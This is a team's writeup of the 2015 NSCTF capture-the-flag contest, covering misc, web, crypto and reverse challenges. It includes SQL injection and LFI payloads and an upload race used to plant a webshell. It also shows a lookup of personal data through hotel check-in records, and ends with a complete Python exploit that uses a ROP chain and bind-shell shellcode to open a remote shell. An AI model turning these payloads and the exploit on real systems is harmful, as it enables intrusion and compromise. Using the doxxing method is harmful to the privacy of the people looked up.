
网络尖刀107团队 (Team 107): Writeup for NSCTF, the NSFOCUS Northwest Universities Cyber Security Attack & Defense Competition

2015-09-30 23:15

About the competition

NSFOCUS-CTF is a cyber security attack-and-defense competition for universities in Northwest China, organized by the NSFOCUS R&D Center. Its goal is to spread security knowledge, raise awareness of network attack and defense, and find talented players, offering generous prizes and job offers.

Team 107 of 网络尖刀 also took part. We did not make the top ten, but NSCTF was the team's first competition, and we gained a lot both technically and in terms of teamwork. Below is the writeup compiled by Team 107, shared for everyone.

 

MISC:

MISC1

(screenshots)

Flag: NSCTF_nsfocus666

MISC2

(screenshot)

A RAR archive: we carved it out with WinHex and saved it as a separate .rar file.

Opening it asked for a password. Going back to the download page (screenshot) showed that the password is nsfocus followed by 5 digits, so we generated a dictionary and brute-forced it.

(screenshot)

Opening the archive reveals the flag.

(screenshot)

flag{NCTF_R4r_Cr4ck}

MISC3

(screenshot)

Card: download a file named card, then upload it to "swipe" it. The card balance is 96.4, and the challenge hint says to change the balance to 208.

(screenshot)

It needs to be changed to:

(screenshot)

The approach (hint given by a0zy):

(screenshot)

Web:

Web1

This one was pure luck. After entering there was nothing useful; Ctrl+U to view the source showed nothing either, so we wanted to see which language the links used.

Tried index.php: it turned out the site redirects from index.php to index.html. Heh.

(screenshot)

Web2

Who are you

Where do you come from

Where are you going

Are you from Mars?

We knew the Referer and X-Forwarded-For headers had to be changed, but not to what; we finally solved it with a hint from a fellow player.

(screenshot)

101.200.73.168 is the IP of www.nsctf.net.

(screenshot)

That returned a string; base64-decoding it gives the flag.

flag:{NSCTF_488b7a2dccd02a734165c39ba4517dbc}

Web3

The PHP version was visible in the response headers, and there was a ver field in the POST body, so we tried it:

http://www.nsctf.net:8002/fa81bb665474f11c025b5355582af315/web/03/?key=&ver=5.5.9-1ubuntu4.12

web4

There was a password.txt that could be downloaded and used for brute-forcing, but on reflection the password was probably a special string. Ctrl+F for "ns" found two candidates; Nsf0cuS looked most likely. Submitting it directly failed, but submitting it through Burp worked (we only saw later that the form limited the input length). Submitting it returned a cookie that base64-decodes to 290bca70c7dae93db6644fa00b9d83b9.php.

That page was Xiao Hei's message board.

(screenshot)

We captured the request and modified the POST data and the cookie.

Submitting admin did not work.

(screenshot)

We tried many values: 小黑, xiaohei, Xiaohei... then remembered the system is Linux, and root worked.

Web5

Encode: very similar to a problem from scaw a few days earlier, so we just wrote a decoder.

(screenshot)

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

web6

Javascript

We found this in the page's JS source:

```javascript
eval(unescape("var%20strKey1%20%3D%20%22JaVa3C41ptIsAGo0DStAff%22%3B%0Avar%20strKey2%20%3D%20%22CaNUknOWThIsK3y%22%3B%0Avar%20strKey3%20%3D%20String.fromCharCode%2871%2C%2048%2C%20111%2C%20100%2C%2033%29%3B%0Aif%20%28uname%20%3D%3D%20%28strKey3%20+%20%28%28%28strKey1.toLowerCase%28%29%29.substring%280%2C%20strKey1.indexOf%28%220%22%29%29%20+%20strKey2.substring%282%2C%206%29%29.toUpperCase%28%29%29.substring%280%2C%2015%29%29%29%20%7B%0A%20%20%20%20var%20strKey4%20%3D%20%27Java_Scr1pt_Pa4sW0rd_K3y_H3re%27%3B%0A%20%20%20%20if%20%28upass%20%3D%3D%20%28strKey4.substring%28strKey4.indexOf%28%271%27%2C%205%29%2C%20strKey4.length%20-%20strKey4.indexOf%28%27_%27%29%20+%205%29%29%29%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Login%20Success%21%27%29%3B%0A%20%20%20%20%20%20%20%20document.getElementById%28%27key%27%29.innerHTML%20%3D%20unescape%28%22%253Cfont%2520color%253D%2522%2523000%2522%253Ea2V5X0NoM2NrXy50eHQ%3D%253C/font%253E%22%29%3B%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Password%20Error%21%27%29%3B%0A%20%20%20%20%7D%0A%7D%20else%20%7B%0A%20%20%20%20alert%28%27Login%20Failed%21%27%29%3B%0A%7D"))
```

 

Decoding and tidying it up gives:

(screenshot)

We extracted the key expressions and ran them:

(screenshot)

This yields uname and pass:

G0od!JAVA3C41PTISAGO
1pt_Pa4sW0rd_K3y_H3re

Decoding %3Cfont%20color%3D%22%23000%22%3Ea2V5X0NoM2NrXy50eHQ=%3C/font%3E and tidying it up gives:

(screenshot)

(screenshot)

Visiting that gave a new link, Ch3ck_Au7h.php.

Visiting it said the username was wrong.

http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/Ch3ck_Au7h.php?username=G0od!JAVA3C41PTISAGO&password=1pt_Pa4sW0rd_K3y_H3re was still wrong; only then did we realize that what we had recovered were uname and pass.

http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/Ch3ck_Au7h.php?uname=G0od!JAVA3C41PTISAGO&upass=1pt_Pa4sW0rd_K3y_H3r gave the flag.

flag:{NSCTF_d7590edfdf8bcf958ced10cec94273ad}

web7

social engineering

Social engineering is not really our strength; this was solved by following teammates' hints.

(screenshot)

Since we had no wordlist generator, we wrote the password candidates by hand.

(screenshot)

(screenshot)

Luckily, before we had even finished the list, one try hit: Xiaoming09231995.

Submitting it returned a phone number, 13588342951.

The social-engineering databases we had collected turned up nothing. A teammate suggested looking for hotel check-in records; we found a lookup service via Baidu, entered the number, and got a name and ID number.

(screenshot)

We tried "Chinese-style passwords" once more with no luck, the birthday with no luck, and then the ID number, which worked.

flag:{NSCTF_3ad65730a8f203a5ab861169e9547f6d}

web8

LFI

We guessed local file include, but had no real idea how to proceed. In a chat group (can't remember whether it was the official one) someone had posted this: php://filter

Searching for it turned up this article: http://forum.cnsec.org/thread-94335-1-1.html

(screenshot)

That is the format. It did not work in the URL, but POSTing php://filter/read=convert.base64-encode/resource=index.php directly from the input box worked and returned the source of index.php; base64-decode it.

(screenshot)

flag:{NSCTF_9bac7a6e289bf89ee0061bd0abdef0ab}

web9

Not solved.

Web10

Not solved.

Web11

File Upload

File upload, right? But anything uploaded was deleted immediately. We uploaded many times, with one computer uploading and another fetching, and never caught the file. Finally a teammate told us it takes thousands of uploads for one to survive, so a script was the only way.

After some effort, the code was ready!

(screenshot)

Still no luck, probably because the interval between upload and access was still too large. So we built a dummy parameter brute-force in Burp, which amounts to uploading continuously, and the Python script did just one thing: check for a 200 status on the access. Success!!!

We first uploaded a one-line webshell, but it was deleted as soon as it was uploaded. We then decided to read index.php instead and changed the upload content to:

(screenshot)

(screenshot)

And that did it. Tears of joy!

Web12

Sqli

Testing username=admin%2527+and+1=1+–+ and

admin%2527+order+by+1+–+ succeeded, but adding union select 1,2 failed. A teammate then suggested that %a0 could replace the space; we tried it and it worked. From there it was ordinary injection:

username=xx%27%a0union%a0select%a01,flag%a0from%a0flag%23 gives the flag.

Crypto:

Crypto01

The magic string

We tried many things. Finally, AES first, which gives: flag{DISJV_Hej_UdShofjyed}

Then a Caesar shift: {NSCTF_Rot_EnCryption}

Crypto02

The magic picture

foremost under Kali extracts two images; the other image shows:

(screenshot)

Crypto03

The mysterious picture + 10086

We opened it with Stegsolve and found several QR-code-like images, none of which would scan. We generated a QR code of our own to compare and noticed the colors seemed inverted; after inverting the colors it scanned. Sure enough:

(screenshot)

flag{NSCTF_Qr_C0De}

Reverse:

Reverse-1 (500 points)

Team 107 solved this one but forgot to submit; who knew the competition would end so early? That cost us a top-ten spot. Still, we post the exploit and the approach here for everyone's reference.

Approach: blind fuzzing -> protocol analysis -> DEP bypass

The exploit:

```python
#coding: utf-8
# Python 2 / pwntools exploit as written by the team.
from pwn import *
import sys

HOST = sys.argv[1]

conn = remote(HOST, 2994)
conn.newline = "\r\n"

# get header
conn.recv()

# get addr
log.info("try to get the base addr")
conn.sendline("STATUS")
base = int(conn.recv().strip()[-10:], 16)
log.success("base addr => {}".format(hex(base)))

# first encrypt, to get the table
log.info("send the first packet, try to get the table")
conn.sendline("ENCRYPT \x80\x00" + "A"*0x80)
conn.recv(3)
table_enc = conn.recv(0x80)
table = []
for c in table_enc:
    table.append(ord(c)^ord('A'))
log.success("Table:")
for c in table:
    print hex(c),
print

# second encrypt, exploit!
log.info("send the second packet, try to exploit it")
payload = "A" * 512

# save esp to eax, ebx
payload += pack(base+0x1001)
payload += pack(base+0x1004)

# point ebx to shellcode
payload += pack(base+0x1015)
payload += pack(base+0x1015)
payload += pack(base+0x1015)
payload += pack(base+0x1015)
payload += pack(base+0x1015)

# point eax to parameter1
payload += pack(base+0x100e)
payload += pack(base+0x100e)
payload += pack(base+0x100e)
payload += pack(base+0x100e)
payload += pack(base+0x100e)
payload += pack(base+0x3814)
payload += pack(0x4)
payload += pack(base+0x5c0a)

# modify parameter 1
payload += pack(base+0x1007)

# point eax to ret addr & modify ret
payload += pack(base+0x100a)
payload += pack(base+0x1007)

# call VirtualProtect
payload += pack(base+0x101b)

payload += "AAAA"
payload += "BBBB"
payload += pack(0x200)
payload += pack(0x40)
payload += pack(0x00010000)
payload += "\x90" * 200

# shellcode for bind shell
payload += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
payload += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
payload += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
payload += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
payload += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
payload += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
payload += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
payload += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
payload += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
payload += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
payload += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
payload += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
payload += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
payload += "\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68"
payload += "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
payload += "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57"
payload += "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1"
payload += "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63"
payload += "\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59"
payload += "\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24"
payload += "\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56"
payload += "\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e"
payload += "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
payload += "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
payload += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
payload += "\x53\xff\xd5"

# xor payload
offset = ''
for i in xrange(len(payload)):
    offset += chr(ord(payload[i])^table[i%128])
conn.sendline('ENCRYPT \xf0\x08'+offset)

# close the connection
conn.close()

# interact
conn = remote(HOST, 4444)
log.success("enjoy!")
conn.interactive(prompt="")
conn.close()
```


Compiled and edited by: iDer

Source: www.ijiandao.com/safe/cto/16082.html
